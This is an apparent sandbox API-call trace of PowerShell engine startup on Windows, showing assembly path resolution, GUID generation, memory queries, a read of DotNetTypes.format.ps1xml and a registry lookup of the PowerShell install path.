	[0580.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0580.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0582.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0582.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0582.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0582.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0582.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0582.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0582.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0582.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0582.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0582.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcc650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0584.325] VirtualQuery (in: lpAddress=0xcbc60, lpBuffer=0xccb20, dwLength=0x30 | out: lpBuffer=0xccb20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0584.326] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xb72c22f2, Data2=0xc74c, Data3=0x4a47, Data4=([0]=0x9f, [1]=0x8c, [2]=0x63, [3]=0x43, [4]=0x82, [5]=0xd9, [6]=0xb7, [7]=0xc6))) returned 0x0
	[0584.327] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x7d9cbbf7, Data2=0xa0f8, Data3=0x439c, Data4=([0]=0x99, [1]=0x67, [2]=0xc, [3]=0x76, [4]=0x59, [5]=0x28, [6]=0x49, [7]=0xda))) returned 0x0
	[0584.328] VirtualQuery (in: lpAddress=0xcbe10, lpBuffer=0xcccd0, dwLength=0x30 | out: lpBuffer=0xcccd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0584.329] VirtualQuery (in: lpAddress=0xcbe10, lpBuffer=0xcccd0, dwLength=0x30 | out: lpBuffer=0xcccd0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0584.330] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xc3e6c9db, Data2=0x5106, Data3=0x4f0c, Data4=([0]=0xab, [1]=0xcd, [2]=0x8c, [3]=0x1, [4]=0xb8, [5]=0xf2, [6]=0x9c, [7]=0xaa))) returned 0x0
	[0585.879] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x42797e43, Data2=0x810b, Data3=0x4a6e, Data4=([0]=0xbe, [1]=0x92, [2]=0xde, [3]=0x85, [4]=0x47, [5]=0xb9, [6]=0x28, [7]=0xe3))) returned 0x0
	[0585.880] VirtualQuery (in: lpAddress=0xcc060, lpBuffer=0xccf20, dwLength=0x30 | out: lpBuffer=0xccf20*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0585.881] VirtualQuery (in: lpAddress=0xcbda0, lpBuffer=0xccc60, dwLength=0x30 | out: lpBuffer=0xccc60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0585.882] VirtualQuery (in: lpAddress=0xcbda0, lpBuffer=0xccc60, dwLength=0x30 | out: lpBuffer=0xccc60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0585.896] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xeacbceee, Data2=0x2574, Data3=0x41d8, Data4=([0]=0xad, [1]=0x6f, [2]=0x8f, [3]=0x59, [4]=0x2c, [5]=0x95, [6]=0x13, [7]=0x1b))) returned 0x0
	[0585.896] VirtualQuery (in: lpAddress=0xcc060, lpBuffer=0xccf20, dwLength=0x30 | out: lpBuffer=0xccf20*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0585.897] VirtualQuery (in: lpAddress=0xcbe80, lpBuffer=0xccd40, dwLength=0x30 | out: lpBuffer=0xccd40*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0585.898] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0585.898] VirtualQuery (in: lpAddress=0xcb6d0, lpBuffer=0xcc590, dwLength=0x30 | out: lpBuffer=0xcc590*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0585.899] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x312ba348, Data2=0x8752, Data3=0x4f19, Data4=([0]=0xbd, [1]=0x64, [2]=0x6a, [3]=0x23, [4]=0xdb, [5]=0x3b, [6]=0xea, [7]=0x14))) returned 0x0
	[0585.899] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x7316454e, Data2=0x2df6, Data3=0x4874, Data4=([0]=0xac, [1]=0xd5, [2]=0x6d, [3]=0xb0, [4]=0xf3, [5]=0xcd, [6]=0x66, [7]=0xaa))) returned 0x0
	[0585.899] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0585.900] GetFileType (hFile=0x330) returned 0x1
	[0585.900] SetErrorMode (uMode=0x1) returned 0x1
	[0585.900] GetFileType (hFile=0x330) returned 0x1
	[0585.900] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.903] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.903] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.903] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.903] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.903] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.903] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.904] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.905] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.905] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.905] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.905] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.905] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.905] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.906] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.906] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.908] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x1000, lpOverlapped=0x0) returned 1
	[0585.908] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0xbce, lpOverlapped=0x0) returned 1
	[0585.908] ReadFile (in: hFile=0x330, lpBuffer=0x3471d66, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3471d66*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0585.908] ReadFile (in: hFile=0x330, lpBuffer=0x3472630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd138, lpOverlapped=0x0 | out: lpBuffer=0x3472630*, lpNumberOfBytesRead=0xcd138*=0x0, lpOverlapped=0x0) returned 1
	[0585.908] CloseHandle (hObject=0x330) returned 1
	[0585.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0585.909] SetErrorMode (uMode=0x1) returned 0x1
	[0585.909] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd0e0 | out: lpFileInformation=0xcd0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0585.909] SetErrorMode (uMode=0x1) returned 0x1
	[0585.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0585.909] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x330) returned 0x0
	[0585.909] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd14c, lpData=0x0, lpcbData=0xcd148*=0x0 | out: lpType=0xcd14c*=0x1, lpData=0x0, lpcbData=0xcd148*=0x56) returned 0x0
	[0585.909] CoTaskMemAlloc (cb=0x5a) returned 0x345800
	[0585.909] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd11c, lpData=0x345800, lpcbData=0xcd118*=0x56 | out: lpType=0xcd11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd118*=0x56) returned 0x0
	[0585.910] CoTaskMemFree (pv=0x345800) 
	[0585.910] RegCloseKey (hKey=0x330) returned 0x0
	[0585.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0585.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0585.911] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x6ba7013b, Data2=0x2dde, Data3=0x4827, Data4=([0]=0x8e, [1]=0x28, [2]=0x6e, [3]=0x9d, [4]=0x5f, [5]=0xf0, [6]=0x46, [7]=0x5d))) returned 0x0
	[0585.911] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xd56f83b3, Data2=0xea49, Data3=0x40af, Data4=([0]=0x82, [1]=0x6e, [2]=0x77, [3]=0x92, [4]=0xb7, [5]=0xdf, [6]=0x4f, [7]=0x90))) returned 0x0
	[0585.911] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x31212abb, Data2=0xcb66, Data3=0x405c, Data4=([0]=0xae, [1]=0x8d, [2]=0x40, [3]=0xdb, [4]=0xd0, [5]=0xb2, [6]=0xbd, [7]=0x9b))) returned 0x0
	[0585.911] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xe16f21ce, Data2=0x9844, Data3=0x4d46, Data4=([0]=0x98, [1]=0x22, [2]=0xa2, [3]=0xd0, [4]=0x5, [5]=0xe8, [6]=0xfa, [7]=0x39))) returned 0x0
	[0585.912] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x4e8307d3, Data2=0xf250, Data3=0x42cc, Data4=([0]=0x98, [1]=0x49, [2]=0x0, [3]=0x6e, [4]=0x60, [5]=0x11, [6]=0xc0, [7]=0x62))) returned 0x0
	[0585.912] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x867bae9c, Data2=0xa644, Data3=0x44aa, Data4=([0]=0x81, [1]=0xc9, [2]=0x92, [3]=0xf1, [4]=0xe1, [5]=0x1f, [6]=0x65, [7]=0xea))) returned 0x0
	[0585.912] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x5bfddfa0, Data2=0xd57a, Data3=0x4e3c, Data4=([0]=0xb8, [1]=0xa2, [2]=0x83, [3]=0x8e, [4]=0xc5, [5]=0x3a, [6]=0xc9, [7]=0x5a))) returned 0x0
	[0585.912] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x76c3cf75, Data2=0x3826, Data3=0x4d64, Data4=([0]=0x91, [1]=0x71, [2]=0x2f, [3]=0xc5, [4]=0x63, [5]=0x86, [6]=0x3a, [7]=0x9d))) returned 0x0
	[0585.912] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xfb2fe410, Data2=0x3b66, Data3=0x4d07, Data4=([0]=0x93, [1]=0x10, [2]=0x76, [3]=0xe0, [4]=0x4b, [5]=0x90, [6]=0xd4, [7]=0xc1))) returned 0x0
	[0585.912] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x81ca8926, Data2=0xb16, Data3=0x4866, Data4=([0]=0x8c, [1]=0x7b, [2]=0x19, [3]=0xca, [4]=0x19, [5]=0x2f, [6]=0xd4, [7]=0x9d))) returned 0x0
	[0585.913] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xda145335, Data2=0x4430, Data3=0x4c27, Data4=([0]=0xaf, [1]=0x26, [2]=0xf5, [3]=0x6d, [4]=0x2e, [5]=0xd3, [6]=0x23, [7]=0xc0))) returned 0x0
	[0585.913] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x6d741b18, Data2=0xae0c, Data3=0x43d9, Data4=([0]=0xa2, [1]=0xa6, [2]=0xe5, [3]=0xb, [4]=0x9, [5]=0x15, [6]=0xca, [7]=0x80))) returned 0x0
	[0585.913] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x5ccad072, Data2=0xd128, Data3=0x4b6a, Data4=([0]=0x8c, [1]=0x35, [2]=0x9, [3]=0xc0, [4]=0x3, [5]=0x59, [6]=0xb8, [7]=0xba))) returned 0x0
	[0585.913] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xee93b940, Data2=0x3606, Data3=0x402e, Data4=([0]=0x96, [1]=0x61, [2]=0xfa, [3]=0xe7, [4]=0x62, [5]=0x46, [6]=0x97, [7]=0xcf))) returned 0x0
	[0585.913] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xaa7ef27f, Data2=0x564, Data3=0x4f33, Data4=([0]=0x98, [1]=0xb1, [2]=0x6a, [3]=0xb2, [4]=0x32, [5]=0x8a, [6]=0x7c, [7]=0xa6))) returned 0x0
	[0585.914] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xf7c6d83c, Data2=0xfc47, Data3=0x441b, Data4=([0]=0xa9, [1]=0xca, [2]=0x38, [3]=0xb7, [4]=0xd8, [5]=0xcd, [6]=0x65, [7]=0xeb))) returned 0x0
	[0585.914] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x5dad5e08, Data2=0xf302, Data3=0x439e, Data4=([0]=0xb2, [1]=0x69, [2]=0x10, [3]=0x1f, [4]=0xf4, [5]=0xb2, [6]=0x4c, [7]=0x77))) returned 0x0
	[0585.914] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xc051b869, Data2=0xe3be, Data3=0x4e7f, Data4=([0]=0x88, [1]=0x2a, [2]=0x85, [3]=0xc, [4]=0x6a, [5]=0x9f, [6]=0xe5, [7]=0x77))) returned 0x0
	[0585.914] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x2e4ae726, Data2=0xf8ec, Data3=0x4eed, Data4=([0]=0x90, [1]=0x9c, [2]=0x47, [3]=0xad, [4]=0x4e, [5]=0x13, [6]=0xe7, [7]=0x5b))) returned 0x0
	[0585.914] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x9c78f7db, Data2=0x3a4a, Data3=0x4cb7, Data4=([0]=0x88, [1]=0xd5, [2]=0x82, [3]=0xf8, [4]=0xfa, [5]=0x71, [6]=0x83, [7]=0x84))) returned 0x0
	[0585.914] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x4f26b6e3, Data2=0xc9ee, Data3=0x4905, Data4=([0]=0xa4, [1]=0xe5, [2]=0x85, [3]=0x55, [4]=0xdd, [5]=0x78, [6]=0xa7, [7]=0xd9))) returned 0x0
	[0585.914] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xeb9dbe4d, Data2=0xac6d, Data3=0x4ee2, Data4=([0]=0xa9, [1]=0x54, [2]=0x6f, [3]=0x9f, [4]=0xaf, [5]=0xa1, [6]=0x29, [7]=0xb4))) returned 0x0
	[0585.915] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xcf4bc73c, Data2=0x44a5, Data3=0x4189, Data4=([0]=0xa2, [1]=0xe5, [2]=0x8f, [3]=0xe5, [4]=0x98, [5]=0xdd, [6]=0xb2, [7]=0xb6))) returned 0x0
	[0585.915] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xe318e015, Data2=0xfca1, Data3=0x45b1, Data4=([0]=0xaf, [1]=0x72, [2]=0x32, [3]=0xb3, [4]=0xc0, [5]=0x6e, [6]=0x96, [7]=0xa7))) returned 0x0
	[0585.915] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0xf76a96d3, Data2=0x6a23, Data3=0x4421, Data4=([0]=0xab, [1]=0xc4, [2]=0x95, [3]=0x90, [4]=0x54, [5]=0x9, [6]=0xc5, [7]=0xef))) returned 0x0
	[0585.915] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x411f427d, Data2=0xf204, Data3=0x40b7, Data4=([0]=0xa4, [1]=0x3f, [2]=0x1d, [3]=0x66, [4]=0x8a, [5]=0xbd, [6]=0x83, [7]=0xa1))) returned 0x0
	[0585.915] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x9aabb82b, Data2=0xfa19, Data3=0x42af, Data4=([0]=0xb6, [1]=0x35, [2]=0x5c, [3]=0xaf, [4]=0x87, [5]=0x6d, [6]=0xd9, [7]=0xf2))) returned 0x0
	[0585.915] CoCreateGuid (in: pguid=0xcd3f0 | out: pguid=0xcd3f0*(Data1=0x8de81b72, Data2=0x63e, Data3=0x4468, Data4=([0]=0xac, [1]=0xa4, [2]=0x6a, [3]=0x2d, [4]=0xad, [5]=0xa6, [6]=0x7, [7]=0x59))) returned 0x0
